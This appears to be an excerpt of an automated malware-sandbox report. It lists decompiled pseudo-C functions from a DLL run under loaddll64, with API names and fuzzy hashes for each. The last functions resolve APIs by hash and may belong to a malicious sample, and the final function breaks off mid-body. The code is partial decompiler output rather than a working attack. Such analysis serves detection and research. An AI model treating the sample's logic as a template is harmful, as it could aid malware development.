                                • Opcode Fuzzy Hash: 1c690db1309c7a900eb2931eff8c1d9e19a22f9b812b3326b35846991b02b16e
                                • Instruction Fuzzy Hash: A481BF22B18E2A86FB509F6599406BD26E8BF44BACF424175CE0E337D5DF3CA461C720
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 20%
                                			E00007FFC7FFC130F446C(signed int __edx, void* __edi, void* __esi, long long __rbx, signed long long __rcx, void* __rdx, long long __r8, void* __r9, long long _a8) {
                                				signed long long _v72;
                                				char _v80;
                                				intOrPtr _v87;
                                				char _v88;
                                				long long _v96;
                                				long long _v104;
                                				int _v108;
                                				intOrPtr _v112;
                                				short _v116;
                                				char _v120;
                                				signed long long _v128;
                                				signed long long _v136;
                                				intOrPtr _v144;
                                				signed int _v152;
                                				int _t80;
                                				long _t85;
                                				signed char _t86;
                                				signed long long _t116;
                                				intOrPtr _t120;
                                				long* _t125;
                                				signed long long _t127;
                                				intOrPtr _t136;
                                				signed long long _t140;
                                				void* _t143;
                                				signed long long _t146;
                                				void* _t148;
                                				void* _t156;
                                				void* _t157;
                                				signed long long _t161;
                                
                                				_t127 = __rcx;
                                				_a8 = __rbx;
                                				_t116 =  *0x13123760; // 0x8abfd9f97faf
                                				_v72 = _t116 ^ _t148 - 0x00000080;
                                				r12d = r9d;
                                				_t161 = __edx >> 6;
                                				_t146 = __edx << 6;
                                				_v96 = __r8;
                                				_t125 = __rcx;
                                				_t157 = _t156 + __r8;
                                				_t120 =  *((intOrPtr*)( *((intOrPtr*)(0x13124970 + _t161 * 8)) + _t146 + 0x28));
                                				_v104 = 0x13124970;
                                				_v108 = GetConsoleCP();
                                				 *__rcx = __rdx;
                                				 *((intOrPtr*)(__rcx + 8)) = 0;
                                				if (__r8 - _t157 >= 0) goto 0x130f464a;
                                				r13b =  *((intOrPtr*)(__r8));
                                				_v120 = 0;
                                				_t136 =  *((intOrPtr*)(0x13124970 + _t161 * 8));
                                				_t86 =  *(_t136 + _t146 + 0x3d);
                                				if ((_t86 & 0x00000004) == 0) goto 0x130f451f;
                                				 *(_t136 + _t146 + 0x3d) = _t86 & 0x000000fb;
                                				r8d = 2;
                                				_v88 =  *((intOrPtr*)(_t136 + _t146 + 0x3e));
                                				_v87 = r13b;
                                				goto 0x130f4564;
                                				E00007FFC7FFC130F1740(_t86 & 0x000000fb, 0, _t120, __rcx, __rcx,  &_v88, __r9);
                                				if (( *(_t120 + _t127 * 2) & 0x00008000) == 0) goto 0x130f455b;
                                				if (__r8 - _t157 >= 0) goto 0x130f462a;
                                				r8d = 2;
                                				if (E00007FFC7FFC130F1654( &_v120, __r8) == 0xffffffff) goto 0x130f464a;
                                				_t143 = __r8 + 1;
                                				goto 0x130f4576;
                                				r8d = 1;
                                				if (E00007FFC7FFC130F1654( &_v120, _t143) == 0xffffffff) goto 0x130f464a;
                                				_v128 = _v128 & 0x00000000;
                                				_v136 = _v136 & 0x00000000;
                                				r9d = 1;
                                				_v144 = 5;
                                				_v152 =  &_v80;
                                				_t80 = WideCharToMultiByte(??, ??, ??, ??, ??, ??, ??, ??);
                                				r14d = _t80;
                                				if (_t80 == 0) goto 0x130f464a;
                                				_v152 = _v152 & 0x00000000;
                                				_t140 =  &_v80;
                                				r8d = _t80;
                                				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x130f4642;
                                				_t125[1] = _t125[2] - _v96 + __edi;
                                				if (_v112 - r14d < 0) goto 0x130f464a;
                                				if (r13b != 0xa) goto 0x130f4622;
                                				_t50 = _t140 + 0xd; // 0xd
                                				_v152 = _t140;
                                				_t52 = _t140 + 1; // 0x1
                                				r8d = _t52;
                                				_v116 = _t50;
                                				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x130f4642;
                                				if (_v112 - 1 < 0) goto 0x130f464a;
                                				_t125[2] = _t125[2] + 1;
                                				_t125[1] = _t125[1] + 1;
                                				goto 0x130f44e0;
                                				 *((char*)( *((intOrPtr*)(0x13124970 + _t161 * 8)) + _t146 + 0x3e)) =  *((intOrPtr*)(_t143 + 1));
                                				 *( *((intOrPtr*)(0x13124970 + _t161 * 8)) + _t146 + 0x3d) =  *( *((intOrPtr*)(0x13124970 + _t161 * 8)) + _t146 + 0x3d) | 0x00000004;
                                				_t125[1] = _t125[1] + 1;
                                				goto 0x130f464a;
                                				_t85 = GetLastError();
                                				 *_t125 = _t85;
                                				E00007FFC7FFC130F6D80();
                                				return _t85;
                                			}

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                • String ID:
                                • API String ID: 3659116390-0
                                • Opcode ID: d55e4a3dc7fda081f8c103fa79b76e6ac1113be7caa21f5244fb0ba4ff43a9cd
                                • Instruction ID: 9de9824038147a5cd8e5a518f35adca10164798dc89546b3ec1ab7c393af6ecd
                                • Opcode Fuzzy Hash: d55e4a3dc7fda081f8c103fa79b76e6ac1113be7caa21f5244fb0ba4ff43a9cd
                                • Instruction Fuzzy Hash: 7B51D232A18A658AFB10CF25E9443AD37B4FB48BACF148135CE0A67798DF38D165C710
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 36%
                                			E00007FFC7FFC130EF320(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
                                				signed long long _t72;
                                				signed long long _t76;
                                				intOrPtr _t78;
                                				signed long long _t80;
                                				signed long long _t89;
                                				struct HINSTANCE__* _t94;
                                				signed long long _t95;
                                				long long _t101;
                                				void* _t105;
                                				signed long long _t109;
                                				signed long long _t111;
                                				signed long long _t114;
                                				struct HINSTANCE__* _t115;
                                				long _t118;
                                				void* _t121;
                                				WCHAR* _t123;
                                
                                				 *((long long*)(_t105 + 8)) = __rbx;
                                				 *((long long*)(_t105 + 0x10)) = _t101;
                                				 *((long long*)(_t105 + 0x18)) = __rsi;
                                				r14d = __ecx;
                                				_t111 =  *0x13123760; // 0x8abfd9f97faf
                                				_t95 = _t94 | 0xffffffff;
                                				_t89 = _t111 ^  *(0x7ffc130e0000 + 0x44810 + _t121 * 8);
                                				asm("dec eax");
                                				if (_t89 == _t95) goto 0x130ef4a1;
                                				if (_t89 == 0) goto 0x130ef389;
                                				_t72 = _t89;
                                				goto 0x130ef4a3;
                                				if (__r8 == __r9) goto 0x130ef435;
                                				_t78 =  *((intOrPtr*)(0x7ffc130e0000 + 0x44770 + __rsi * 8));
                                				if (_t78 == 0) goto 0x130ef3a9;
                                				if (_t78 == _t95) goto 0x130ef421;
                                				goto 0x130ef41c;
                                				r8d = 0x800;
                                				LoadLibraryExW(_t123, _t121, _t118);
                                				if (_t72 != 0) goto 0x130ef3ea;
                                				if (GetLastError() != 0x57) goto 0x130ef3e8;
                                				r8d = 0;
                                				LoadLibraryExW(??, ??, ??);
                                				_t80 = _t72;
                                				goto 0x130ef3ea;
                                				if (_t80 != 0) goto 0x130ef403;
                                				 *((intOrPtr*)(0x7ffc130e0000 + 0x44770 + __rsi * 8)) = _t95;
                                				goto 0x130ef421;
                                				_t19 = 0x7ffc130e0000 + 0x44770 + __rsi * 8;
                                				_t76 =  *_t19;
                                				 *_t19 = _t80;
                                				if (_t76 == 0) goto 0x130ef41c;
                                				FreeLibrary(_t115);
                                				if (_t80 != 0) goto 0x130ef476;
                                				if (__r8 + 4 != __r9) goto 0x130ef392;
                                				if (_t80 == 0) goto 0x130ef486;
                                				GetProcAddress(_t94);
                                				if (_t76 == 0) goto 0x130ef47f;
                                				_t109 =  *0x13123760; // 0x8abfd9f97faf
                                				asm("dec eax");
                                				 *(0x7ffc130e0000 + 0x44810 + _t121 * 8) = _t76 ^ _t109;
                                				goto 0x130ef4a3;
                                				goto 0x130ef437;
                                				_t114 =  *0x13123760; // 0x8abfd9f97faf
                                				asm("dec eax");
                                				 *(0x7ffc130e0000 + 0x44810 + _t121 * 8) = _t95 ^ _t114;
                                				return 0;
                                			}

                                APIs
                                • GetProcAddress.KERNEL32(?,00008ABFD9F97FAF,00000004,00007FFC130EF647,?,?,00000000,00007FFC130EF1C7,?,?,00008ABFD9F97FAF,00007FFC130EE6A9), ref: 00007FFC130EF442
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: AddressProc
                                • String ID:
                                • API String ID: 190572456-0
                                • Opcode ID: 455019633da336f5729206dc12b9164558a1ea73cc9de17300a2dc75095f9908
                                • Instruction ID: b3c1aa9b45117998430089d8621a0ccc55ad2349ced2e3cb28d30a168b23aa20
                                • Opcode Fuzzy Hash: 455019633da336f5729206dc12b9164558a1ea73cc9de17300a2dc75095f9908
                                • Instruction Fuzzy Hash: CE4128A2B0EE6981FE118B52A80027523D1BF04BF8F1A4939DD1D5B7C4EF3CE015C214
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 32%
                                			E00007FFC7FFC130F4EEC(void* __edx, long long __rax, long long __rbx, void* __rcx, long long* __rdx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
                                				intOrPtr _v32;
                                				long long _v40;
                                				void* _t11;
                                				long long _t49;
                                
                                				_a8 = __rbx;
                                				_a16 = __rbp;
                                				_a24 = __rsi;
                                				if (__rcx != 0) goto 0x130f4f28;
                                				_t11 = E00007FFC7FFC130EE6A0(__rax);
                                				 *((intOrPtr*)(__rax)) = 0x16;
                                				E00007FFC7FFC130EE580(_t11);
                                				goto 0x130f4fc9;
                                				if (__rdx == 0) goto 0x130f4f11;
                                				E00007FFC7FFC130EF4C0();
                                				_v32 = 0;
                                				r15d = 0;
                                				 *__rdx = _t49;
                                				r15b = 0 == 0;
                                				_v40 = _t49;
                                				r9d = r9d | 0xffffffff;
                                				if (MultiByteToWideChar(??, ??, ??, ??, ??, ??) != 0) goto 0x130f4f6f;
                                				E00007FFC7FFC130EE630(GetLastError(), __rax, __rbx);
                                				goto 0x130f4f21;
                                				E00007FFC7FFC130EE154(__rax, _t14 + _t14);
                                				if (__rax == 0) goto 0x130f4fbf;
                                				_v32 = r14d;
                                				r9d = r9d | 0xffffffff;
                                				_v40 = __rax;
                                				if (MultiByteToWideChar(??, ??, ??, ??, ??, ??) != 0) goto 0x130f4fb1;
                                				E00007FFC7FFC130EE630(GetLastError(), __rax, __rax);
                                				goto 0x130f4fbf;
                                				 *__rdx = __rax;
                                				E00007FFC7FFC130EE114(__rax, _t49);
                                				return 1;
                                			}







                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: ByteCharErrorLastMultiWide$AllocateHeap_invalid_parameter_noinfo
                                • String ID:
                                • API String ID: 1500607604-0
                                • Opcode ID: 68226cd7c6c8364906c3fc8632874d394513f4a7677611d84de0b260f5baa58c
                                • Instruction ID: bead81b311d4956a53ee90830fa4c9ec142b17a700b8c3690d425cc51ce643dc
                                • Opcode Fuzzy Hash: 68226cd7c6c8364906c3fc8632874d394513f4a7677611d84de0b260f5baa58c
                                • Instruction Fuzzy Hash: 5121B531B08F6A42FA149F66AD0013AA2D9AFC4BB8F150934ED5D637D5EE3CD464C220
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 85%
                                			E00007FFC7FFC130F6400(signed int __ecx, void* __edx, long long __rbx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
                                				signed int _t27;
                                				signed int _t28;
                                				signed int _t29;
                                				signed int _t30;
                                				signed int _t31;
                                				signed int _t43;
                                				signed int _t44;
                                				signed int _t45;
                                				signed int _t47;
                                				void* _t52;
                                
                                				_a8 = __rbx;
                                				_a16 = __rsi;
                                				_t27 = __ecx & 0x0000001f;
                                				if ((__ecx & 0x00000008) == 0) goto 0x130f6431;
                                				if (__edx >= 0) goto 0x130f6431;
                                				E00007FFC7FFC130F6BDC(_t27, _t52);
                                				_t28 = _t27 & 0xfffffff7;
                                				goto 0x130f6488;
                                				_t43 = 0x00000004 & dil;
                                				if (_t43 == 0) goto 0x130f644c;
                                				asm("dec eax");
                                				if (_t43 >= 0) goto 0x130f644c;
                                				E00007FFC7FFC130F6BDC(_t28, _t52);
                                				_t29 = _t28 & 0xfffffffb;
                                				goto 0x130f6488;
                                				_t44 = dil & 0x00000001;
                                				if (_t44 == 0) goto 0x130f6468;
                                				asm("dec eax");
                                				if (_t44 >= 0) goto 0x130f6468;
                                				E00007FFC7FFC130F6BDC(_t29, _t52);
                                				_t30 = _t29 & 0xfffffffe;
                                				goto 0x130f6488;
                                				_t45 = dil & 0x00000002;
                                				if (_t45 == 0) goto 0x130f6488;
                                				asm("dec eax");
                                				if (_t45 >= 0) goto 0x130f6488;
                                				if ((dil & 0x00000010) == 0) goto 0x130f6485;
                                				E00007FFC7FFC130F6BDC(_t30, _t52);
                                				_t31 = _t30 & 0xfffffffd;
                                				_t47 = dil & 0x00000010;
                                				if (_t47 == 0) goto 0x130f64a2;
                                				asm("dec eax");
                                				if (_t47 >= 0) goto 0x130f64a2;
                                				E00007FFC7FFC130F6BDC(_t31, _t52);
                                				return 0 | (_t31 & 0xffffffef) == 0x00000000;
                                			}













                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: _set_statfp
                                • String ID:
                                • API String ID: 1156100317-0
                                • Opcode ID: 8e204902ee3cdeb9f77a3f964fa6f85e84bca92309d804b1f408b313ac172a76
                                • Instruction ID: 964fa575040371325d65a34880e014d11f59a0afc52581298c705295d34a18fa
                                • Opcode Fuzzy Hash: 8e204902ee3cdeb9f77a3f964fa6f85e84bca92309d804b1f408b313ac172a76
                                • Instruction Fuzzy Hash: 8F11C426E18E3F0BF6542134DF4637911D96F453BCE080AB4E96E27AD6CE2D7461D231
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 16%
                                			E00007FFC7FFC130F4898(signed int __edx, void* __edi, void* __rax, signed long long __rbx, signed int* __rcx, long long __rbp, signed short* __r8, signed long long _a8, signed long long _a16, long long _a24, char _a40, char _a1744, char _a1752, signed long long _a5176, void* _a5192) {
                                				intOrPtr _v0;
                                				signed long long _v8;
                                				int _t33;
                                				long _t37;
                                				void* _t38;
                                				signed int _t39;
                                				int _t48;
                                				signed long long _t60;
                                				short* _t65;
                                				signed int* _t66;
                                				void* _t82;
                                				void* _t89;
                                				void* _t95;
                                				void* _t98;
                                				void* _t101;
                                				void* _t102;
                                
                                				_a8 = __rbx;
                                				_a24 = __rbp;
                                				E00007FFC7FFC130F7050(_t38, __rax, __rcx, _t82, __r8, _t95, _t98);
                                				_t60 =  *0x13123760; // 0x8abfd9f97faf
                                				_a5176 = _t60 ^ _t89 - __rax;
                                				r14d = r9d;
                                				r10d = r10d & 0x0000003f;
                                				_t102 = _t101 + __r8;
                                				 *__rcx =  *__rcx & 0x00000000;
                                				__rcx[1] =  *((intOrPtr*)(0x13124970 + (__edx >> 6) * 8));
                                				if (__r8 - _t102 >= 0) goto 0x130f49db;
                                				_t65 =  &_a40;
                                				if (__r8 - _t102 >= 0) goto 0x130f4943;
                                				_t39 =  *__r8 & 0x0000ffff;
                                				if (_t39 != 0xa) goto 0x130f492f;
                                				 *_t65 = 0xd;
                                				_t66 = _t65 + 2;
                                				 *_t66 = _t39;
                                				if ( &(_t66[0]) -  &_a1744 < 0) goto 0x130f4911;
                                				_a16 = _a16 & 0x00000000;
                                				_a8 = _a8 & 0x00000000;
                                				_v0 = 0xd55;
                                				_v8 =  &_a1752;
                                				r9d = 0;
                                				_t33 = WideCharToMultiByte(??, ??, ??, ??, ??, ??, ??, ??);
                                				_t48 = _t33;
                                				if (_t33 == 0) goto 0x130f49d3;
                                				if (_t33 == 0) goto 0x130f49c3;
                                				_v8 = _v8 & 0x00000000;
                                				r8d = _t48;
                                				r8d = r8d;
                                				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x130f49d3;
                                				if (0 + _a24 - _t48 < 0) goto 0x130f4990;
                                				__rcx[1] = __edi - r15d;
                                				goto 0x130f4906;
                                				_t37 = GetLastError();
                                				 *__rcx = _t37;
                                				E00007FFC7FFC130F6D80();
                                				return _t37;
                                			}



















                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: ByteCharErrorFileLastMultiWideWrite
                                • String ID: U
                                • API String ID: 2456169464-4171548499
                                • Opcode ID: a2d3cb67cfcf3dc513eb76f03ce482a2aef41a2ff1dbddf9374cbcdbadebe864
                                • Instruction ID: c6116eb31599becb4ad0f909fe8d585fdfe02209de7472e901fd323701e8414b
                                • Opcode Fuzzy Hash: a2d3cb67cfcf3dc513eb76f03ce482a2aef41a2ff1dbddf9374cbcdbadebe864
                                • Instruction Fuzzy Hash: E941F622B1CA5982EB20CF25E8043BA77A4FB887A8F414031EE8DA7788DF3CD511C750
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 19%
                                			E00000201201640CA238(void* __ecx, void* __edi, void* __ebp, void* __eflags, long long __rbx, void* __rcx, void* __rdx, long long __r8, void* __r9, void* _a8, long long* _a24, char _a32) {
                                				char _v72;
                                				char _v80;
                                				char _v88;
                                				long long _v104;
                                				void* __rdi;
                                				void* __rsi;
                                				void* __rbp;
                                				void* _t41;
                                				void* _t43;
                                				long long* _t82;
                                				long long _t83;
                                				long long _t84;
                                				intOrPtr _t108;
                                				void* _t109;
                                				intOrPtr _t110;
                                				void* _t112;
                                				void* _t115;
                                				long long* _t118;
                                				void* _t130;
                                				long _t133;
                                				void* _t134;
                                				long _t136;
                                				void* _t139;
                                
                                				_t84 = __rbx;
                                				_t82 = _t118;
                                				 *((long long*)(_t82 + 8)) = __rbx;
                                				 *((long long*)(_t82 + 0x18)) = __r8;
                                				_t3 = _t82 + 0x20; // 0xfb849fa7
                                				_t134 = __rcx;
                                				E00000201201640C24B0(__rbx, _t3, _t112);
                                				if (_t82 == 0) goto 0x640ca3dc;
                                				E00000201201640C908C(0xfb849f8f, _t82,  *((intOrPtr*)( *0x640cd458 + 0x18)));
                                				if (_t82 == 0) goto 0x640ca29f;
                                				_v88 =  *_t82();
                                				goto 0x640ca2a5;
                                				_v88 = 0;
                                				_t10 = _t82 + 1; // 0x1
                                				r8d = _t109 + _t10;
                                				HeapAlloc(_t139, _t136, _t133);
                                				_v80 = _t82;
                                				if (_t82 == 0) goto 0x640ca3ce;
                                				0x640c47b0();
                                				_t13 = _t109 + 1; // 0x1
                                				r8d = _t13;
                                				0x640c47b0();
                                				E00000201201640C908C(0xfb849f8f, _t82,  *((intOrPtr*)( *0x640cd458 + 0x18)));
                                				if (_t82 == 0) goto 0x640ca30d;
                                				 *_t82();
                                				goto 0x640ca30f;
                                				_t16 =  &_a32; // 0xfb84a007
                                				_t17 =  &_v72; // 0xfb849f9f
                                				r8d = 0;
                                				_v104 = _t16;
                                				_t41 = E00000201201640C7CF4(_t82, _t84, _t134, _t82,  *((intOrPtr*)( *0x640cd458 + 8)), _t17, _t130, _t109);
                                				HeapFree(??, ??, ??);
                                				if (_t41 != 0) goto 0x640ca3ce;
                                				r8d = _a32;
                                				_t108 = _v72;
                                				_t21 =  &_v88; // 0xfb849f8f
                                				_t83 = _t21;
                                				_t22 =  &_v80; // 0xfb849f87
                                				_v104 = _t83;
                                				_t43 = E00000201201640C52B8(_t84, _t108, _t82,  *((intOrPtr*)( *0x640cd458 + 8)), _t22, _t112, _t115);
                                				_t110 = _v80;
                                				if (_v88 == 0) goto 0x640ca389;
                                				if ( *((char*)(_t108 + _t110)) != 0x3d) goto 0x640ca389;
                                				if (_t134 - 1 != 0) goto 0x640ca37a;
                                				 *((char*)(_t83 + _t110)) = 0;
                                				if (_t43 != 0) goto 0x640ca3b0;
                                				E00000201201640C7500(_t84, _t110, _t108, _t110, _t82,  *((intOrPtr*)( *0x640cd458 + 8)));
                                				if (_t83 != 0) goto 0x640ca3a5;
                                				_t29 = _t83 + 8; // 0x8
                                				goto 0x640ca3b0;
                                				 *_a24 = _t83;
                                				HeapFree(??, ??, ??);
                                				HeapFree(??, ??, ??);
                                				HeapFree(??, ??, ??);
                                				return _t29;
                                			}


























                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.631292957.00000201640C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201640C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_201640c0000_loaddll64.jbxd
                                Similarity
                                • API ID: Heap$Free$Alloc$ErrorLast
                                • String ID:
                                • API String ID: 1659099196-0
                                • Opcode ID: ebec7e3ced01d3e53c95a68bcdc967b9fa3e31920521932be2b83d349f2b3dc9
                                • Instruction ID: 88865e83111980dff0510f088ed9f7e1209d0e105b784afecbfde7a3da43b2c0
                                • Opcode Fuzzy Hash: ebec7e3ced01d3e53c95a68bcdc967b9fa3e31920521932be2b83d349f2b3dc9
                                • Instruction Fuzzy Hash: B141D0313047A0CBEB54DB56A85979A63A9FBC9BC4F144025BF4E4374AEF39C4158B48
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 41%
                                			E00000201201640C2DC4(void* __rcx, long long __rdx, long long __r8, signed int _a8, long long* _a16, signed int* _a24, signed int _a32) {
                                				intOrPtr _v88;
                                				void* _v96;
                                				void* _v104;
                                				long long _v112;
                                				signed int _v120;
                                				long long _v128;
                                				long long _v136;
                                				void* __rbx;
                                				void* __rdi;
                                				void* __rsi;
                                				void* __rbp;
                                				signed int _t72;
                                				signed int _t80;
                                				void* _t81;
                                				void* _t97;
                                				signed int _t98;
                                				void* _t99;
                                				void* _t114;
                                				long long* _t139;
                                				signed long long _t140;
                                				long long* _t142;
                                				void* _t143;
                                				void* _t169;
                                				void* _t170;
                                				void* _t172;
                                				signed int _t173;
                                				long _t177;
                                				void* _t179;
                                				void* _t190;
                                				void* _t191;
                                				void* _t192;
                                				signed int* _t193;
                                				long long _t194;
                                				void* _t200;
                                				long _t202;
                                				void* _t205;
                                
                                				_t191 = _t179;
                                				 *((long long*)(_t191 + 0x18)) = __r8;
                                				 *((long long*)(_t191 + 0x10)) = __rdx;
                                				_t203 =  *0x640cd458;
                                				 *(_t191 + 0x20) =  *(_t191 + 0x20) & 0x00000000;
                                				_t170 = __rcx;
                                				_v120 =  *0x640cd450;
                                				r15d = 0;
                                				 *(_t191 - 0x60) =  *(_t191 - 0x60) & _t205;
                                				_v112 =  *((intOrPtr*)( *0x640cd458 + 8));
                                				if (E00000201201640C4320(_t143, __rcx, _t191 - 0x68, __rcx, _t172, _t191 + 8) == 0) goto 0x640c2e29;
                                				_t12 = _t205 + 1; // 0x1
                                				r12d = _t12;
                                				_v104 = _t172;
                                				goto 0x640c2e34;
                                				_t173 = _v104;
                                				r12d = 2;
                                				_t15 =  &_a32; // 0xca
                                				if (E00000201201640C4880(r12d, _t114,  *((intOrPtr*)( *0x640cd458 + 8)), _t143, _t170,  &_v96, _t15) != 0) goto 0x640c2f94;
                                				r8d = _a32;
                                				r13d = r8d;
                                				r13d = r13d - r12d;
                                				_t193 = _v96;
                                				if (_t173 == 0) goto 0x640c2e8d;
                                				_t72 = _a8;
                                				_t193[0xa] = 1;
                                				_t193[0x12] = _t173;
                                				_t193[0xd] = _t72;
                                				_t193[0x10] = _t72;
                                				_t25 = _t170 + 0xc0; // 0xc0
                                				r9d = 0;
                                				 *_t193 = _v120 ^ 0x62ade362;
                                				_t193[3] =  *(_t170 + 0x48);
                                				_t193[2] =  *(_t170 + 0x4c);
                                				_t30 =  &_a8; // 0xb2
                                				_v128 = _t30;
                                				_t32 =  &_v120; // 0x32
                                				_v136 = _t32;
                                				_t97 = E00000201201640C1BFC(_t32, _t143, _t25, _t193);
                                				HeapFree(_t205, _t202, _t200);
                                				if (r13d == 0) goto 0x640c2f01;
                                				if (_t97 == 0) goto 0x640c2ef6;
                                				if (_t97 != 0x10d2) goto 0x640c2f01;
                                				E00000201201640CA3F8(r13d, _t32, _t143, _t170, _t173, _t177, _t192, _t169);
                                				if (_t97 != 0) goto 0x640c2f94;
                                				_t98 = _a8;
                                				_t194 = _v120;
                                				r13d =  *(_t170 + 0x4c);
                                				_t80 = E00000201201640C6C1C(_t98, _t194);
                                				_t38 =  &_a8; // 0xb2
                                				r9d = 1;
                                				 *(_t170 + 0x48) = _t98;
                                				 *(_t170 + 0x4c) = _t80;
                                				_t81 = E00000201201640C7B6C(_t143, _t170, _t194, _t173, _t177, _t38, _t190, _t191);
                                				_t99 = _t81;
                                				if (_t81 != 0) goto 0x640c2f71;
                                				_t139 = _a16;
                                				 *_t139 = _t194;
                                				 *_a24 = _a8;
                                				if ( *(_t170 + 0x4c) != r13d) goto 0x640c2fcd;
                                				goto 0x640c2fc7;
                                				HeapFree(_t172, _t177, _t143);
                                				_t47 = _t170 + 0xc0; // 0xc0
                                				E00000201201640C47B8(_t99, _t139, _t143, _t47, _t177);
                                				goto 0x640c2faf;
                                				if (_t99 == 0x10d2) goto 0x640c2fc2;
                                				_t48 = _t170 + 0xc0; // 0xc0
                                				if (E00000201201640C47B8(_t99, _t139, _t143, _t48, _t177) != 0) goto 0x640c2fcd;
                                				asm("lock or dword [edi+0xec], 0x1");
                                				goto 0x640c2fcd;
                                				r15d = 1;
                                				if ( *((intOrPtr*)(_t170 + 0x60)) == 0) goto 0x640c302f;
                                				E00000201201640C908C(0x9c66d81c, _t139,  *((intOrPtr*)( *0x640cd458 + 0x18)));
                                				if (_t139 == 0) goto 0x640c2fed;
                                				 *_t139();
                                				if (r15d == 0) goto 0x640c301c;
                                				_t140 =  *((intOrPtr*)(_t170 + 0x58));
                                				if (_v88 - _t140 <= 0) goto 0x640c301c;
                                				_t57 = _t170 + 0xc0; // 0xc1
